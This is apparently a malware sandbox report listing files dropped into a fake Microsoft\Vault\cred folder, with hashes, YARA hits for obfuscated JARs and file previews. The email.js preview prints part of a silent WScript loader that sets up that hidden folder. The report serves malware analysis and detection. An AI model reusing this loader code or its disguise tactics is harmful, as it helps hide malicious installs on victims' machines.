Yara Hits:	Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\checker.jar, Author: Joe Security
Preview:	PK.........~"Z................META-INF/MANIFEST.MFUT....vg.....M..LK-...K-...R0.3..M...u.I,..Rp....<...3R..S.......%.V.z\\.PK...t.:@...C...PK.........~"Z................DomainInfoChecker.classUT.....vg.z.\|T...93.y....$.L...&..d+Y..G..H...I.H2af..0.H.j.Vq...[..X. U...j....5v...n.j.-5..o&...._}....s....G.@De.O&ue.....l....k....Li{.=.......w..5...3e^.<_.1..&.1..p...V.d..w..K...Z.D.f2.............Jk..W..V_0..tZ.HJ2.h.........T..6_xS0.....3..^..K.,d.t3M...d.B6&s(...C....L..Q..Bv.a..........Va}..g:(G..2)..._dc.eH.[(.f..Y...~}g..&,5......\|X..\.[@.P./..M..?.`..A.....N*J...z.....@)...u.....p.s."...R).......r..Z.....L.&s.}K.X\.d......&.U.h..y....i."].....H..+.x...g....7.u.Xh.f.z.-...hUGWx....R....o_..=T.....VxC>.].Yr..._.......ttx;[.f_........P..]O.....0qO.+.....OJ..6...r....k.......Hn.O..."h......I.j.5..f.]......"<f..A..C.[3.]....m..Y`..$5z..\|B..(...@+....S8.mZh...z2....k...Fe.4.;.....%.,....>....m.{;.....X...Ry.,....b.@.......F.Ji...:.}A.-N.....

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\email.js

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	5022
Entropy (8bit):	4.7576785822912235
Encrypted:	false
SSDEEP:	96:uqHCpeUp4py7F+zfCP84CDjyuoZkMZR9GJD7YvOQt:B+P84MGu+vKJwv
MD5:	1C705A86AC6290CAF3B6E557E10681BE
SHA1:	C3F8BCC0F76B0CC212A41308DD9BBD9BAB415F78
SHA-256:	391FE065AA0B69D15E372C8E589F25C39110298FF6421C5CD093798E970DFD22
SHA-512:	57FC49E028B9850D9B6FD5567269802DD2C6ED669821744C1E6F6740022249B07E5A53C3EF08781C6C888F2B007707E93F5253A080589839B388130632E0715E
Malicious:	false
Preview:	// Initialize FileSystemObject..var fso = null;..try {.. fso = WScript.CreateObject("Scripting.FileSystemObject");..} catch (e) {.. WScript.Quit(); // Quit silently if an error occurs..}....// Get the current script file path..var scriptPath = "";..try {.. scriptPath = WScript.ScriptFullName;..} catch (e) {.. WScript.Quit(); // Quit silently if an error occurs..}....// Get the current user's AppData path and construct the folder path..var shell = null;..var appDataPath = "";..var vaultFolderPath = "";..var credFolderPath = "";..try {.. shell = WScript.CreateObject("WScript.Shell");.. appDataPath = shell.ExpandEnvironmentStrings("%AppData%");.. vaultFolderPath = appDataPath + "\\Microsoft\\Vault";.. credFolderPath = vaultFolderPath + "\\cred";..} catch (e) {.. WScript.Quit(); // Quit silently if an error occurs..}....// Ensure the Vault folder exists..try {.. if (!fso.FolderExists(vaultFolderPath)) {.. fso.CreateFolder(vaultFolderPath);.. }..} cat

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\ffjcext.zip

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	14156
Entropy (8bit):	5.672987563244314
Encrypted:	false
SSDEEP:	96:ml16O9Ddj5Lx7pZYEPmpaepmgEkm0rUHK5PKJyysO+kkoyENQqzw9YhXaGOSm94I:mlZRdBTZiWyp
MD5:	9AE31C48A9F5F8288527492F0B6C9EFB
SHA1:	1821CE14F7EAFD64595501730B8BF696247BD95C
SHA-256:	98E1A739A1D70BCBB5AD3E6CB2399E4EFBFA02C68BF47DFB3B29D837089FBBAD
SHA-512:	CF72C9EB6F7CE2E9B2D598536662F561C468822F030B85364F691E1A58B82EE62F0D97E13F36B29B908E5EE60C3A79AB6018B84F2E4A25BE48FC14A9344453BF
Malicious:	false
Preview:	PK.........B>Y............'...{CAFEEFAC-0018-0000-0431-ABCDEFFEDCBA}/UT...y_.fy_.fux.............PK.........B>Y................{CAFEEFAC-0018-0000-0431-ABCDEFFEDCBA}/chrome/UT...x_.fx_.fux.............PK.........B>Y............6...{CAFEEFAC-0018-0000-0431-ABCDEFFEDCBA}/chrome/content/UT...x_.fx_.fux.............PK.........B>Y............>...{CAFEEFAC-0018-0000-0431-ABCDEFFEDCBA}/chrome/content/ffjcext/UT...x_.fx_.fux.............PK.........B>Y..Tc........H...{CAFEEFAC-0018-0000-0431-ABCDEFFEDCBA}/chrome/content/ffjcext/ffjcext.jsUT...x_.fx_.fux.............const gJavaConsole1_8_0_431 = {...id.: "javaconsole1.8.0_431",...mimeType: "application/x-java-applet;jpi-version=1.8.0_431",...install.: function() {...window.addEventListener("load",this.init,false);..},...init.: function() { ...if (navigator.mimeTypes[gJavaConsole1_8_0_431.mimeType]) {....var toolsPopup = document.getElementById("menu_ToolsPopup");.....toolsPopup.addEventListener("popupshowing",gJavaConsole1_8_0_431.enable,false)

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\history.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	14331795
Entropy (8bit):	7.99176693947253
Encrypted:	true
SSDEEP:	393216:+iemgRTRXhULBbDDSga4pVyWU3zZtACpckkulE99:+37XhUlWgaQyWQoJulEj
MD5:	72F278E298D9BFFD1E0CE99E77165261
SHA1:	F2C2E3F866786466B414E1D1CB94AFF032E00177
SHA-256:	8C42A4566FF65A29CAAA3B2670914AAF9A32EACA643A2CE7C99C21BA1D828541
SHA-512:	18ABBB5A0FEF311E592BE34ABA5EDA8A7BC1F8A2EA17EEDF550605B050A98306EF00E6441CBF516903AB64FEA35DB97EA19F39E70CA6FFB021BC3E4EDA7B8167
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BranchlockObfuscator, Description: Yara detected Branchlock Obfuscator, Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\history.jar, Author: Joe Security
Preview:	PK........5}"Z............,...org/sqlite/native/Linux/arm/libsqlitejdbc.soUT.....vg......\|T..=.'.....).z.X....DMmZ.....D....H....Bh.....6.B..6.Zioji.*...H..?l.`.......@.Q.FK....\|Nr....y^...}.9..;3.....xM...CX.\.@...r!..%.1C..H+... .......}m.....s.M...Q.vi..!...9.\.t...Q.P.t.;....g..n..#...F.c....,..fC.8.?~.Gn........Yy..KY.q.7...}.o\u....w.m.hx..g..B~?$w....L4......r~...Fn...ma..7....#.k#Wa...r_......4..\........9.'.-r...'w....\.>..M.0...h$..r.xv...........\=....ar.......Z..~..)..#.}<.F.o+..r......TrM.V..@....r...!.....7.Br....p.......E...#WKn..\|.\...+....}..-....w.....'y..[E.<...}.$}.^r...Y....7.?._..i_L..r..].g.a[.l...........6.rr..{..G]V\|..k....6.$_...]?.N.?F..\...I..a{~..An.....]H.+.+O@WY..X?......6.GO!...........}.g..9?y..._z...s!......s5..f^...j.....\......j...vX....A......u.>.FYZ...^..E.E..@.~8.,.@.........ay.t..g..<..y..?.....P...^....=..g...o.t.ek...<....,.GE..j....'#?.......-...>Pr.......\|.............?Z..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\messages.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	2860
Entropy (8bit):	4.793521742012267
Encrypted:	false
SSDEEP:	48:pSDUEm98mDhDdDDLc59BXnnyzEEUFggBne8TCHCHb2ttfe4ey1nttAUicf9EEZze:pSDi98mFV45bAUS1HCHb2tjHEElfJo
MD5:	811BAFA6F97801186910E9B1D9927FE2
SHA1:	DC52841C708E3C1EB2A044088A43396D1291BB5E
SHA-256:	926CCADAEC649F621590D1AA5E915481016564E7AB28390C8D68BDAAF4785F1F
SHA-512:	5AE9C27DCE552EA32603B2C87C1510858F86D9D10CADE691B2E54747C3602FE75DE032CF8917DCD4EE160EE4CC5BE2E708B321BB1D5CDEBFA9FE46C2F870CA7C
Malicious:	false
Preview:	#.# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=internal error, unknown message.error.badinst.nojre=Bad installation. No JRE found in configuration file.error.launch.execv=Error encountered while invoking Java Web Start (execv).error.launch.sysexec=Error encountered while invoking Java Web Start (SysExec) .error.listener.failed=Splash: sysCreateListenerSocket failed.error.accept.failed=Splash: accept failed.error.recv.failed=Splash: recv failed.error.invalid.port=Splash: didn't revive a valid port.error.read=Read past end of buffer.error.xmlparsing=XML Parsing error: wrong kind of token found.error.splash.exit=Java Web Start splash screen process exiting .....\n.# "Last WinSock Error" means the error message for the last operation that failed..error.winsock=\tLast WinSock Error: .error.winsock.load=Couldn't load winsock.dll.error.winsock.start=WSAStartup failed.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\messages_de.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with very long lines (1345)
Category:	dropped
Size (bytes):	3306
Entropy (8bit):	4.888605396125911
Encrypted:	false
SSDEEP:	96:MLHMLhMXQXTyf2IXOZza2uuFMir25pAvAv2ITOsdK:OHOh4QD+JJcFZY+ITOqK
MD5:	D77C3B5274B8161328AB5C78F66DD0D0
SHA1:	D989FE1B8F7904888D5102294EBEFD28D932ECDB
SHA-256:	C9399A33BB9C75345130B99D1D7CE886D9148F1936543587848C47B8540DA640
SHA-512:	696E28B6BC7E834C51AB9821D0D65D1A32F00EB15CAA732047B751288EA73D8D703D3152BF81F267147F8C1538E1BF470748DF41176392F10E622F4C7708DD92
Malicious:	false
Preview:	#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=interner Fehler, unbekannte Meldung.error.badinst.nojre=Ung\u00FCltige Installation. Keine JRE in Konfigurationsdatei gefunden.error.launch.execv=Fehler beim Aufrufen von Java Web Start (execv) aufgetreten.error.launch.sysexec=Fehler beim Aufrufen von Java Web Start (SysExec) aufgetreten.error.listener.failed=Startbildschirm: sysCreateListenerSocket nicht erfolgreich.error.accept.failed=Startbildschirm: accept nicht erfolgreich.error.recv.failed=Startbildschirm: recv nicht erfolgreich.error.invalid.port=Startbildschirm: Reaktivierung eines g\u00FCltigen Ports nicht m\u00F6glich.error.read=\u00DCber Pufferende hinaus gelesen.error.xmlparsing=XML-Parsefehler: Falscher Tokentyp gefunden.error.splash.exit=Prozess f\u00FCr Startbildschirm von Java Web Start wird beendet.....\n.# "Last WinSock Error" means the error mess

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\messages_es.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with very long lines (1475)
Category:	dropped
Size (bytes):	3600
Entropy (8bit):	4.74546152535042
Encrypted:	false
SSDEEP:	96:ovLS0y45dMsqf52i3nkrBpW/QiQdjY0CQ1G:oTSWw3foFNp71G
MD5:	6D32848BD173B9444B71922616E0645E
SHA1:	1B0334B79DB481C3A59BE6915D5118D760C97BAA
SHA-256:	BE987D93E23AB7318DB095727DEDD8461BA6D98B9409EF8FC7F5C79FA9666B84
SHA-512:	8E9E92D3229FF80761010E4878B4A33BFB9F0BD053040FE152565CFB2819467E9A92609B3786F9BDBF0D7934CF3C7D20BC3369FE1AD7D0DF7FADF561C3FDCA3C
Malicious:	false
Preview:	#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=Error interno, mensaje desconocido.error.badinst.nojre=Instalaci\u00F3n incorrecta. No se ha encontrado JRE en el archivo de configuraci\u00F3n.error.launch.execv=Se ha encontrado un error al llamar a Java Web Start (execv).error.launch.sysexec=Se ha encontrado un error al llamar a Java Web Start (SysExec) .error.listener.failed=Pantalla de Presentaci\u00F3n: fallo de sysCreateListenerSocket.error.accept.failed=Pantalla de Presentaci\u00F3n: fallo de accept.error.recv.failed=Pantalla de Presentaci\u00F3n: fallo de recv.error.invalid.port=Pantalla de Presentaci\u00F3n: no se ha activado un puerto v\u00E1lido.error.read=Lectura m\u00E1s all\u00E1 del final del buffer.error.xmlparsing=Error de an\u00E1lisis de XML: se ha encontrado un tipo de token no v\u00E1lido.error.splash.exit=Saliendo del proceso de la pantalla d

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\messages_fr.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with very long lines (1575)
Category:	dropped
Size (bytes):	3409
Entropy (8bit):	4.800862996269612
Encrypted:	false
SSDEEP:	48:pcj7LwORE+DNaQCJhSNiZGBk9zghSqvS//oTnvDHt65NA3gBne8p6KF/uoYuh1Lq:pc3LwqiJhSNiZNQSov0U4t1S4x8X/
MD5:	C11AB66FEDE3042EE75DFD19032C8A72
SHA1:	69BD2D03C2064F8679DE5B4E430EA61B567C69C5
SHA-256:	8DEEEC35ED29348F5755801F42675E3BF3FA7AD4B1E414ACCA283C4DA40E4D77
SHA-512:	072F8923DF111F82F482D65651758B8B4BA2486CB0EA08FB8B113F472A42A1C3BCB00DAE7D1780CF371E2C2BD955D8B66658D5EE15E548B1EEA16B312FDCBDF9
Malicious:	false
Preview:	#.# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=erreur interne, message inconnu.error.badinst.nojre=Installation incorrecte. JRE introuvable dans le fichier de configuration.error.launch.execv=Erreur lors de l'appel de Java Web Start (execv).error.launch.sysexec=Erreur lors de l'appel de Java Web Start (SysExec) .error.listener.failed=Accueil : \u00E9chec de sysCreateListenerSocket.error.accept.failed=Accueil : \u00E9chec d'accept.error.recv.failed=Accueil : \u00E9chec de recv.error.invalid.port=Accueil : impossible de r\u00E9activer un port valide.error.read=Lecture apr\u00E8s la fin de tampon.error.xmlparsing=Erreur d'analyse XML : type incorrect de jeton.error.splash.exit=Le processus d'affichage de l'\u00E9cran d'accueil de Java Web Start est en cours de fermeture...\n.# "Last WinSock Error" means the error message for the last operation that failed..error.w

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\messages_it.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with very long lines (1392)
Category:	dropped
Size (bytes):	3223
Entropy (8bit):	4.671266438569996
Encrypted:	false
SSDEEP:	48:pbv+eaVtVVdMDCU02B9a8+eYbuKY8t5gBne8uo265eLaqMQ6URhmwgFs+ur6N:paearV4l+e6uKY8t5C26+7RhZgRN
MD5:	A81C4B0F3BF9A499429E14A881010EF6
SHA1:	DBE49949308F28540A42AE6CD2AD58AFBF615592
SHA-256:	550954F1F80FE0E73D74EB10AD529B454D5EBC626EB94A6B294D7D2ACF06F372
SHA-512:	6FED61CBCD7FE82C15C9A312ACED9D93836EBCFFAF3E13543BC9DD8B4C88400C371D2365FEEE0F1BB844A6372D4128376568A5B6FE666FD6213636FCBD8C7791
Malicious:	false
Preview:	#.# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=errore interno, messaggio sconosciuto.error.badinst.nojre=Installazione errata. Impossibile trovare il JRE nel file di configurazione.error.launch.execv=Errore durante la chiamata di Java Web Start (execv).error.launch.sysexec=Errore durante la chiamata di Java Web Start (SysExec) .error.listener.failed=Apertura: sysCreateListenerSocket non riuscito.error.accept.failed=Apertura: accept non riuscito.error.recv.failed=Apertura: recv non riuscito.error.invalid.port=Apertura: impossibile identificare una porta valida.error.read=Tentativo di lettura dopo la fine del buffer.error.xmlparsing=Errore durante l'analisi XML: trovato un tipo di token errato.error.splash.exit=Uscita dal processo di schermata iniziale di Java Web Start in corso...\n.# "Last WinSock Error" means the error message for the last operation that faile

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\messages_ja.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with very long lines (2924)
Category:	dropped
Size (bytes):	6349
Entropy (8bit):	4.575777726495053
Encrypted:	false
SSDEEP:	96:Ltk1ZccBD8M25jCTDrk9/RoaG7THG9o7f6tEflA44CAmIbIC3j5pN/o8woJb:W1xBY1CG6OlG2r
MD5:	B7279F1C3BA0B63806F37F6B9D33C314
SHA1:	751170A7CDEFCB1226604AC3F8196E06A04FD7AC
SHA-256:	8D499C1CB14D58E968A823E11D5B114408C010B053B3B38CFEF7EBF9FB49096F
SHA-512:	4A3BF898A36D55010C8A8F92E5A784516475BDFFFCD337D439D6DA251DDB97BCC7E26F104AC5602320019ED5C0B8DC8883B2581760AFEA9C59C74982574D164B
Malicious:	false
Preview:	#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=\u5185\u90E8\u30A8\u30E9\u30FC\u3001\u4E0D\u660E\u306A\u30E1\u30C3\u30BB\u30FC\u30B8.error.badinst.nojre=\u30A4\u30F3\u30B9\u30C8\u30FC\u30EB\u304C\u6B63\u3057\u304F\u3042\u308A\u307E\u305B\u3093\u3002\u69CB\u6210\u30D5\u30A1\u30A4\u30EB\u5185\u306BJRE\u304C\u3042\u308A\u307E\u305B\u3093.error.launch.execv=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(execv).error.launch.sysexec=Java Web Start\u306E\u547C\u51FA\u3057\u4E2D\u306B\u30A8\u30E9\u30FC\u304C\u767A\u751F\u3057\u307E\u3057\u305F(SysExec) .error.listener.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: sysCreateListenerSocket\u306B\u5931\u6557\u3057\u307E\u3057\u305F.error.accept.failed=\u30B9\u30D7\u30E9\u30C3\u30B7\u30E5: accept\u306B\u5931\u6557\u3057\u307E\u3057\u305F.error.recv.failed=\u30B9\

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\messages_ko.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with very long lines (2601)
Category:	dropped
Size (bytes):	5712
Entropy (8bit):	4.758283080201437
Encrypted:	false
SSDEEP:	96:fiX7fdokXLqlz9yx3f7yhJxpmG32i0HkZr+ywc8b8+/moD7yct070DL70Dj:g7ucLoINAYGbT/44i4
MD5:	FED33982E349F696EF21E35ED0DBBDE3
SHA1:	BF9E055B5AB138AD6D49769E2B7630B7938848D6
SHA-256:	D9C95C31B4C1092F32BDCF40D5232B31CC09FB5B68564067C1C2A5F59D3869FA
SHA-512:	88B16B7C3ACFED2FC4B1E3A14006FEF532147EB1E2930D8966E90629069462FB2E8CBF65F561E6CBC9A946F39D1866583CB02D6BB84C60C71428F489DAAA61EF
Malicious:	false
Preview:	#.# Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=\uB0B4\uBD80 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. \uC54C \uC218 \uC5C6\uB294 \uBA54\uC2DC\uC9C0\uC785\uB2C8\uB2E4..error.badinst.nojre=\uC124\uCE58\uAC00 \uC798\uBABB\uB418\uC5C8\uC2B5\uB2C8\uB2E4. \uAD6C\uC131 \uD30C\uC77C\uC5D0\uC11C JRE\uB97C \uCC3E\uC744 \uC218 \uC5C6\uC2B5\uB2C8\uB2E4..error.launch.execv=Java Web Start(execv)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4..error.launch.sysexec=Java Web Start(SysExec)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. .error.listener.failed=\uC2A4\uD50C\uB798\uC2DC: sysCreateListenerSocket\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4..error.accept.failed=\uC2A4\uD50C\uB798\uC2DC: \uC2B9\uC778\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4..error.recv.failed=

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\messages_pt_BR.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with very long lines (1319)
Category:	dropped
Size (bytes):	3285
Entropy (8bit):	4.837889715420947
Encrypted:	false
SSDEEP:	48:R+OfaeLkDcUfLYgIYu9WvXx6K6GBxLy1gBne8u6K0NCMc6MTNTjtA7NZdlw7ZHAz:R1fybjfSIX8pGBxLy1Ba+mZdlw7Zs
MD5:	ED15A441A20EA85C29521A0C7C8C3097
SHA1:	24E4951743521AB9A11381C77BD0CDB1ED30F5B5
SHA-256:	4140663A49040FF191C07D2D04588402263EC2E1679A9A1A79B790A137EE7FB8
SHA-512:	BE5F0639DE6B0AC95792987D0AF83CA77495F7F49953698C8B18692DE982F77B68FE63159E8CD7537D62A71209A9FFABBECF046AD82D8341F613D39F180F9C83
Malicious:	false
Preview:	#.# Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=erro interno, mensagem desconhecida.error.badinst.nojre=Instala\u00E7\u00E3o incorreta. Nenhum JRE encontrado no arquivo de configura\u00E7\u00E3o.error.launch.execv=Erro encontrado ao chamar Java Web Start (execv).error.launch.sysexec=Erro encontrado ao chamar Java Web Start (SysExec) .error.listener.failed=Tela Inicial: falha em sysCreateListenerSocket.error.accept.failed=Tela Inicial: falha na fun\u00E7\u00E3o accept.error.recv.failed=Tela Inicial: falha na fun\u00E7\u00E3o recv.error.invalid.port=Tela Inicial: n\u00E3o reativou uma porta v\u00E1lida.error.read=Ler ap\u00F3s o final do buffer.error.xmlparsing=Erro durante o parsing de XML: tipo incorreto de token encontrado.error.splash.exit=Saindo do processamento da tela inicial do Java Web .....\n.# "Last WinSock Error" means the error message for the last op

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\messages_sv.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with very long lines (1379)
Category:	dropped
Size (bytes):	3384
Entropy (8bit):	4.898189215756456
Encrypted:	false
SSDEEP:	96:U+L1Q6sQcqRo/hMsVsM4ogqxwvpvykU/2/7JCh91XlK7Q/v//Afr:UM1TsGkF/CzJA1KGXIr
MD5:	BF9652F69C3BE79D0972E860990CE375
SHA1:	BB5A4AA0BA499F6B1916A83E3C7922A4583B4ADB
SHA-256:	99D7F49ECD3109370C0C6E8F1230317F7BEA299EBBC811CA780028475E59B547
SHA-512:	61232DFB1D9B9D519EE9B000802286EF2708609EA847737477CA5F762DBBBA917ED958EF38D4F7AEAE45AB7ACF830FCCDB6915C1CE1C17662BAAA7722B843132
Malicious:	false
Preview:	#.# Copyright (c) 2004, 2018, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=internt fel, ok\u00E4nt meddelande.error.badinst.nojre=Felaktig installation. Ingen JRE har hittats i konfigurationsfilen.error.launch.execv=Ett fel intr\u00E4ffade under starten av Java Web Start (execv).error.launch.sysexec=Ett fel intr\u00E4ffade under starten av Java Web Start (SysExec) .error.listener.failed=V\u00E4lkomstsk\u00E4rm: sysCreateListenerSocket utf\u00F6rdes inte.error.accept.failed=V\u00E4lkomstsk\u00E4rm: kunde inte accepteras.error.recv.failed=V\u00E4lkomstsk\u00E4rm: kunde inte mottaga.error.invalid.port=V\u00E4lkomstsk\u00E4rm: \u00E5terskapade inte en giltig port.error.read=L\u00E4ste f\u00F6rbi slutet av bufferten.error.xmlparsing=XML-tolkningsfel: fel typ av token hittades.error.splash.exit=Java Web Start - v\u00E4lkomstsk\u00E4rmen avslutas .....\n.# "Last WinSock Error" means the error me

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\messages_zh_CN.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with very long lines (1857)
Category:	dropped
Size (bytes):	4072
Entropy (8bit):	5.01527031899567
Encrypted:	false
SSDEEP:	96:Ln7OVgLO4c5tgvDgEY4tnf7OgdbywfK0eSm91js:3OVTjqvIwPtK1js
MD5:	E6F84C081895ACDFD98DA0F496E1DD3D
SHA1:	1C2B96673DDDD3596890EF4FC22017D484A1F652
SHA-256:	A1752A0175F490F61E0AAD46DC6887C19711F078309062D5260E164AC844F61A
SHA-512:	D4D28780147E22678CD8E7415CACFAD533AE5AF31D74426BBE4993F05A0707E4F0F71D948093FFA1A0D6EA48310E901CD0ED1C14E2FBDF69C92462D070A9664F
Malicious:	false
Preview:	#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=\u5185\u90E8\u9519\u8BEF, \u672A\u77E5\u6D88\u606F.error.badinst.nojre=\u9519\u8BEF\u5B89\u88C5\u3002\u914D\u7F6E\u6587\u4EF6\u4E2D\u627E\u4E0D\u5230 JRE.error.launch.execv=\u8C03\u7528 Java Web Start (execv) \u65F6\u9047\u5230\u9519\u8BEF.error.launch.sysexec=\u8C03\u7528 Java Web Start (SysExec) \u65F6\u9047\u5230\u9519\u8BEF.error.listener.failed=\u542F\u52A8\u5C4F\u5E55: sysCreateListenerSocket \u5931\u8D25.error.accept.failed=\u542F\u52A8\u5C4F\u5E55: \u63A5\u53D7\u5931\u8D25.error.recv.failed=\u542F\u52A8\u5C4F\u5E55: recv \u5931\u8D25.error.invalid.port=\u542F\u52A8\u5C4F\u5E55: \u672A\u6062\u590D\u6709\u6548\u7AEF\u53E3.error.read=\u8BFB\u53D6\u8D85\u51FA\u7F13\u51B2\u533A\u7ED3\u5C3E.error.xmlparsing=XML \u89E3\u6790\u9519\u8BEF: \u53D1\u73B0\u9519\u8BEF\u7684\u6807\u8BB0\u7C7B\u578B.error.splash.exit=Java

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\messages_zh_HK.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with very long lines (1729)
Category:	dropped
Size (bytes):	3752
Entropy (8bit):	5.14936903006307
Encrypted:	false
SSDEEP:	96:zMWCQv8u9/IzdG/JvFWlHaQzWy/owZFomWdYQCfQ/ydQCyJ:gWCQv7VIxG/JodaQ7PoHWQaQ/6QCY
MD5:	880BAACB176553DEAB39EDBE4B74380D
SHA1:	37A57AAD121C14C25E149206179728FA62203BF0
SHA-256:	FF4A3A92BC92CB08D2C32C435810440FD264EDD63E56EFA39430E0240C835620
SHA-512:	3039315BB283198AF9090BD3D31CFAE68EE73BC2B118BBAE0B32812D4E3FD0F11CE962068D4A17B065DAB9A66EF651B9CB8404C0A2DEFCE74BB6B2D1D93646D5
Malicious:	false
Preview:	#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F.error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE.error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4.error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4.error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557.error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557.error.recv.failed=Splash: recv \u5931\u6557.error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9.error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E.error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E.error.splash.exit=Java Web Start \u9583\u73FE\u87A2\u5E55\u8655\u7

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\messages_zh_TW.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text, with very long lines (1729)
Category:	dropped
Size (bytes):	3752
